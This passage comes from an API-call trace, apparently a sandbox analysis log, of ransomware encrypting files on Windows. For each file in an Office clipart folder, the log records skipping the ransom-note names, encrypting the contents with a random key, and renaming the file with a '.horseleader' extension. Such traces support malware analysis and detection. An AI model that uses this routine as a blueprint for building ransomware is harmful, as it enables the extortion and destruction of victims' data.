lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.806] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.806] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.806] CloseHandle (hObject=0x158) returned 1 [0253.806] GetProcessHeap () returned 0x780000 [0253.806] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.807] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CARBN_01.MID.horseleader") returned 79 [0253.807] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CARBN_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\carbn_01.mid"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CARBN_01.MID.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\carbn_01.mid.horseleader")) returned 1 [0253.808] GetProcessHeap () returned 0x780000 [0253.808] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.808] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xceceee00, ftCreationTime.dwHighDateTime=0x1c9b81d, ftLastAccessTime.dwLowDateTime=0x60382570, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xceceee00, ftLastWriteTime.dwHighDateTime=0x1c9b81d, nFileSizeHigh=0x0, nFileSizeLow=0xdec, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="CG1606.WMF", cAlternateFileName="")) returned 1 [0253.808] lstrcmpiW (lpString1="CG1606.WMF", lpString2="Windows") returned -1 [0253.808] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CG1606.WMF") returned 65 [0253.808] StrStrIW (lpFirst="CG1606.WMF", lpSrch=".horseleader") returned 0x0 [0253.808] lstrcmpW (lpString1="CG1606.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.808] lstrcmpW (lpString1="CG1606.WMF", lpString2="_uninstalling_.png") returned 1 [0253.808] lstrlenW (lpString=".testttjffg") returned 11 [0253.808] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CG1606.WMF", lpSrch=".testttjffg") returned 0x0 [0253.808] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.809] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.809] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CG1606.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\cg1606.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.810] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CG1606.WMF") returned 65 [0253.810] StrStrW (lpFirst="CG1606.WMF", lpSrch=".txt") returned 0x0 [0253.810] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=3564) returned 1 [0253.810] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0xdec, lpOverlapped=0x0) returned 1 [0253.813] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff214, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.813] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0xdec, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0xdec, lpOverlapped=0x0) returned 1 [0253.813] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.813] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.813] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.813] CloseHandle (hObject=0x158) returned 1 [0253.814] GetProcessHeap () returned 0x780000 [0253.814] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.814] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CG1606.WMF.horseleader") returned 77 [0253.814] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CG1606.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\cg1606.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CG1606.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\cg1606.wmf.horseleader")) returned 1 [0253.815] GetProcessHeap () returned 0x780000 [0253.815] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.815] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca0e1800, ftCreationTime.dwHighDateTime=0x1bd0320, ftLastAccessTime.dwLowDateTime=0x51c76e10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xca0e1800, ftLastWriteTime.dwHighDateTime=0x1bd0320, nFileSizeHigh=0x0, nFileSizeLow=0x976, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="CLASSIC1.WMF", cAlternateFileName="")) returned 1 [0253.815] lstrcmpiW (lpString1="CLASSIC1.WMF", lpString2="Windows") returned -1 [0253.815] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC1.WMF") returned 67 [0253.815] StrStrIW (lpFirst="CLASSIC1.WMF", lpSrch=".horseleader") returned 0x0 [0253.815] lstrcmpW (lpString1="CLASSIC1.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.815] lstrcmpW (lpString1="CLASSIC1.WMF", lpString2="_uninstalling_.png") returned 1 [0253.816] lstrlenW (lpString=".testttjffg") returned 11 [0253.816] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC1.WMF", lpSrch=".testttjffg") returned 0x0 [0253.816] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.816] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.816] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC1.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\classic1.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.817] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC1.WMF") returned 67 [0253.817] StrStrW (lpFirst="CLASSIC1.WMF", lpSrch=".txt") returned 0x0 [0253.817] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=2422) returned 1 [0253.817] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x976, lpOverlapped=0x0) returned 1 [0253.820] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff68a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.820] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x976, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x976, lpOverlapped=0x0) returned 1 [0253.820] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.820] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.820] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.820] CloseHandle (hObject=0x158) returned 1 [0253.820] GetProcessHeap () returned 0x780000 [0253.820] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.820] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC1.WMF.horseleader") returned 79 [0253.820] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC1.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\classic1.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC1.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\classic1.wmf.horseleader")) returned 1 [0253.822] GetProcessHeap () returned 0x780000 [0253.822] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.822] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca0e1800, ftCreationTime.dwHighDateTime=0x1bd0320, ftLastAccessTime.dwLowDateTime=0x603a86d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xca0e1800, ftLastWriteTime.dwHighDateTime=0x1bd0320, nFileSizeHigh=0x0, nFileSizeLow=0x8d6, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="CLASSIC2.WMF", cAlternateFileName="")) returned 1 [0253.822] lstrcmpiW (lpString1="CLASSIC2.WMF", lpString2="Windows") returned -1 [0253.822] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC2.WMF") returned 67 [0253.822] StrStrIW (lpFirst="CLASSIC2.WMF", lpSrch=".horseleader") returned 0x0 [0253.822] lstrcmpW (lpString1="CLASSIC2.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.822] lstrcmpW (lpString1="CLASSIC2.WMF", lpString2="_uninstalling_.png") returned 1 [0253.822] lstrlenW (lpString=".testttjffg") returned 11 [0253.822] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC2.WMF", lpSrch=".testttjffg") returned 0x0 [0253.822] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.822] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.822] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC2.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\classic2.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.824] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC2.WMF") returned 67 [0253.824] StrStrW (lpFirst="CLASSIC2.WMF", lpSrch=".txt") returned 0x0 [0253.824] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=2262) returned 1 [0253.824] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x8d6, lpOverlapped=0x0) returned 1 [0253.826] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff72a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.826] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x8d6, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x8d6, lpOverlapped=0x0) returned 1 [0253.826] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.826] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.827] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.827] CloseHandle (hObject=0x158) returned 1 [0253.827] GetProcessHeap () returned 0x780000 [0253.827] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.827] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC2.WMF.horseleader") returned 79 [0253.827] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC2.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\classic2.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC2.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\classic2.wmf.horseleader")) returned 1 [0253.828] GetProcessHeap () returned 0x780000 [0253.828] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.828] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca0e1800, ftCreationTime.dwHighDateTime=0x1bd0320, ftLastAccessTime.dwLowDateTime=0x51c76e10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xca0e1800, ftLastWriteTime.dwHighDateTime=0x1bd0320, nFileSizeHigh=0x0, nFileSizeLow=0x8d6, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="CLIP.WMF", cAlternateFileName="")) returned 1 [0253.829] lstrcmpiW (lpString1="CLIP.WMF", lpString2="Windows") returned -1 [0253.829] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLIP.WMF") returned 63 [0253.829] StrStrIW (lpFirst="CLIP.WMF", lpSrch=".horseleader") returned 0x0 [0253.829] lstrcmpW (lpString1="CLIP.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.829] lstrcmpW (lpString1="CLIP.WMF", lpString2="_uninstalling_.png") returned 1 [0253.829] lstrlenW (lpString=".testttjffg") returned 11 [0253.829] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLIP.WMF", lpSrch=".testttjffg") returned 0x0 [0253.829] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.829] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.829] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLIP.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\clip.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.832] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLIP.WMF") returned 63 [0253.832] StrStrW (lpFirst="CLIP.WMF", lpSrch=".txt") returned 0x0 [0253.832] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=2262) returned 1 [0253.832] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x8d6, lpOverlapped=0x0) returned 1 [0253.834] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff72a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.835] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x8d6, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x8d6, lpOverlapped=0x0) returned 1 [0253.835] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.835] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.835] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.835] CloseHandle (hObject=0x158) returned 1 [0253.835] GetProcessHeap () returned 0x780000 [0253.835] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.836] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLIP.WMF.horseleader") returned 75 [0253.836] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLIP.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\clip.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLIP.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\clip.wmf.horseleader")) returned 1 [0253.836] GetProcessHeap () returned 0x780000 [0253.837] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.837] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca0e1800, ftCreationTime.dwHighDateTime=0x1bd0320, ftLastAccessTime.dwLowDateTime=0x603a86d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xca0e1800, ftLastWriteTime.dwHighDateTime=0x1bd0320, nFileSizeHigh=0x0, nFileSizeLow=0x1b3a, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="CMNTY_01.MID", cAlternateFileName="")) returned 1 [0253.837] lstrcmpiW (lpString1="CMNTY_01.MID", lpString2="Windows") returned -1 [0253.837] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CMNTY_01.MID") returned 67 [0253.837] StrStrIW (lpFirst="CMNTY_01.MID", lpSrch=".horseleader") returned 0x0 [0253.837] lstrcmpW (lpString1="CMNTY_01.MID", lpString2="#Decrypt#.txt") returned 1 [0253.837] lstrcmpW (lpString1="CMNTY_01.MID", lpString2="_uninstalling_.png") returned 1 [0253.837] lstrlenW (lpString=".testttjffg") returned 11 [0253.837] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CMNTY_01.MID", lpSrch=".testttjffg") returned 0x0 [0253.837] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.837] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.837] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CMNTY_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\cmnty_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.837] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CMNTY_01.MID") returned 67 [0253.837] StrStrW (lpFirst="CMNTY_01.MID", lpSrch=".txt") returned 0x0 [0253.837] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=6970) returned 1 [0253.838] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x1b3a, lpOverlapped=0x0) returned 1 [0253.839] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffe4c6, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.840] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x1b3a, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x1b3a, lpOverlapped=0x0) returned 1 [0253.840] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.840] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.840] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.840] CloseHandle (hObject=0x158) returned 1 [0253.840] GetProcessHeap () returned 0x780000 [0253.840] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.840] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CMNTY_01.MID.horseleader") returned 79 [0253.840] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CMNTY_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\cmnty_01.mid"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CMNTY_01.MID.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\cmnty_01.mid.horseleader")) returned 1 [0253.841] GetProcessHeap () returned 0x780000 [0253.841] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.841] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6849b000, ftCreationTime.dwHighDateTime=0x1bd0318, ftLastAccessTime.dwLowDateTime=0x51d0f390, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6849b000, ftLastWriteTime.dwHighDateTime=0x1bd0318, nFileSizeHigh=0x0, nFileSizeLow=0x1496, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="CRANE.WMF", cAlternateFileName="")) returned 1 [0253.841] lstrcmpiW (lpString1="CRANE.WMF", lpString2="Windows") returned -1 [0253.841] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANE.WMF") returned 64 [0253.841] StrStrIW (lpFirst="CRANE.WMF", lpSrch=".horseleader") returned 0x0 [0253.841] lstrcmpW (lpString1="CRANE.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.841] lstrcmpW (lpString1="CRANE.WMF", lpString2="_uninstalling_.png") returned 1 [0253.841] lstrlenW (lpString=".testttjffg") returned 11 [0253.841] 